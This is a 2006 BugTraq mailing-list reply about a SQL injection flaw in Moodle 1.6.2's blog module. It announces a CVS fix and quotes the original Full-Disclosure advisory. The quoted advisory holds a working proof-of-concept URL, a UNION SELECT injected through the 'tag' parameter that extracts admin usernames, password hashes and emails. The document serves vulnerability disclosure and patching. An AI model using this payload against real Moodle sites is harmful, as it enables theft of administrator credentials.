BugTraq
Re: [Full-disclosure] SQL injection - moodle Oct 09 2006 10:47AM
scsantos (at) unigranrio.com (dot) br [email concealed] (scsantos unigranrio com br)
A security vulnerability was recently discovered in all versions of
Moodle 1.6 and later that allows SQL injection. A quick one-line fix has
already been added to CVS to patch this problem for 1.6.x and 1.7 versions.

Update your servers using CVS as soon as possible, or edit the file
blog/index.php in your copy manually as described here:

http://cvs.moodle.com/blog/index.php?r1=1.18.2.2&r2=1.18.2.3

Att,

Silvio Cesar L. dos Santos
Analista de Redes Pleno
DTI - Divisão de Tecnologia da Informação
UNIGRANRIO - Universidade do Grande Rio
+55 21 2672-7720
silviocesar (at) unigranrio.edu (dot) br [email concealed]
scsantos (at) unigranrio.com (dot) br [email concealed]
http://www.unigranrio.br

disfigure wrote:
> /****************************************/
> http://www.w4cking.com
>
> Product:
> moodle 1.6.2
> http://www.moodle.org
>
> Vulnerability:
> SQL injection
>
> Notes:
> - SQL injection can be used to obtain password hash
> - the moodle blog "module" must be enabled
> - guest access to the blog must be enabled
>
> POC:
> <target>/blog/index.php?tag=x%2527%20UNION%20SELECT%20%2527-1%20UNION%20
SELECT%201,1,1,1,1,1,1,username,password,1,1,1,1,1,1,1,username,password
,email%20FROM%20mdl_user%20RIGHT%20JOIN%20mdl_user_admins%20ON%20mdl_use
r.id%3dmdl_user_admins.userid%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1
,1,1,1,1,1,1,1%20FROM%20mdl_post%20p,%20mdl_blog_tag_instance%20bt,%20md
l_user%20u%20WHERE%201%3D0%2527,1,1,%25271
>
>
> Original advisory (requires registration):
> http://w4ck1ng.com/board/showthread.php?t=1305
> /****************************************/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus